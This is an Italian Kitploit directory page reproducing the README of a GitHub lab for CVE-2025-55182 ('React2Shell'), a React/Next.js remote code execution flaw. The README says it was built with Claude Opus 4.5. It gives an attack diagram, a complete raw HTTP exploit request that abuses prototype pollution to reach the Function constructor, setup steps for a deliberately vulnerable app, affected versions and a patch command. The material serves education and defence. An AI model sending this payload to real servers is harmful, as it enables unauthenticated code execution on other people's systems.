Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
react-rce — Abbiamo creato e testato un campione per la vulnerabilità CVE-2025-55182 insieme all'IA. | Kitploit
Strumenti/GitHubGitHub/randarts/react-rce
Framework di ExploitAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebApprendimento e FormazioneSviluppo PayloadLab e Pratica
GitHubrandarts/react-rce

react-rce

Abbiamo creato e testato un campione per la vulnerabilità CVE-2025-55182 insieme all'IA.

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 React2Shell – Esercitazione sulla vulnerabilità

AI utilizzato: Claude Opus 4.5 ⚠️ Avvertenza: Questo ambiente è destinato esclusivamente a scopi educativi e di ricerca.

Panoramica della vulnerabilità

ItemContent
CVECVE-2025-55182 (React) / CVE-2025-66478 (Next.js)
NomeReact2Shell
CVSS10.0 (Critical)
TipoPre-Auth Remote Code Execution
CausaInquinamento del prototipo durante la deserializzazione del protocollo Flight

Principio di attacco

root@kitploit:~
                    ┌─────────────────────────┐
                    │     Attaccante          │
                    └───────────┬─────────────┘
                                │
                    Richiesta POST + Intestazione Next-Action
                    Payload multipart/form-data
                                │
                                ▼
┌───────────────────────────────────────────────────────────┐
│                     Server Next.js                        │
├───────────────────────────────────────────────────────────┤
│  1. Intestazione Next-Action → Attivazione Server Action  │
│  2. Payload multipart → Deserializzazione protocollo Flight│
│  3. Chiamata del metodo then() dell'oggetto Fake Chunk    │
│  4. Riferimento __proto__ → Inquinamento del prototipo    │
│  5. Iniezione costruttore Function → RCE                  │
└───────────────────────────────────────────────────────────┘

Struttura del payload di exploit

root@kitploit:~
POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="0"

{"_response":{"_formData":{"get":"Function"}},"then":"$1:__proto__:then"}
------Boundary
Content-Disposition: form-data; name="1"

$@0
------Boundary--

Elementi chiave:

  • Attivazione di Server Action tramite intestazione Next-Action
  • Field 0: Fake Chunk with then method for promise-like behavior
  • Field 1: attraversamento della catena del prototipo tramite riferimento $@0
  • Accesso al costruttore Function tramite __proto__:then

Avvio rapido

root@kitploit:~
cd vulnerable-app

# Installazione delle dipendenze
npm install

# Avvio del server di sviluppo
npm run dev

Accesso su http://localhost:3000


Struttura delle directory

root@kitploit:~
react-rce/
├── README.md
├── vulnerable-app/          # 취약한 Next.js 앱
│   ├── package.json         # Next.js 15.0.3 (취약 버전)
│   └── app/
│       ├── page.js          # UI (CVE 정보 + RCE 시연)
│       ├── actions.js       # Server Actions
│       └── globals.css
└── exploit/                 # 공격 도구 (선택)
    └── exploit.py           # CVE-2025-55182 PoC

Versioni interessate

  • React: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (con App Router)
  • Pacchetti: react-server-dom-webpack, react-server-dom-turbopack

Metodo di difesa

root@kitploit:~
# Aggiornamento alle versioni corrette
npm install [email protected] [email protected] [email protected]

Riferimenti

  • Avviso di sicurezza Next.js
  • GitHub: assetnote/react2shell-scanner
  • GitHub: freeqaz/react2shell
Scarica lo strumento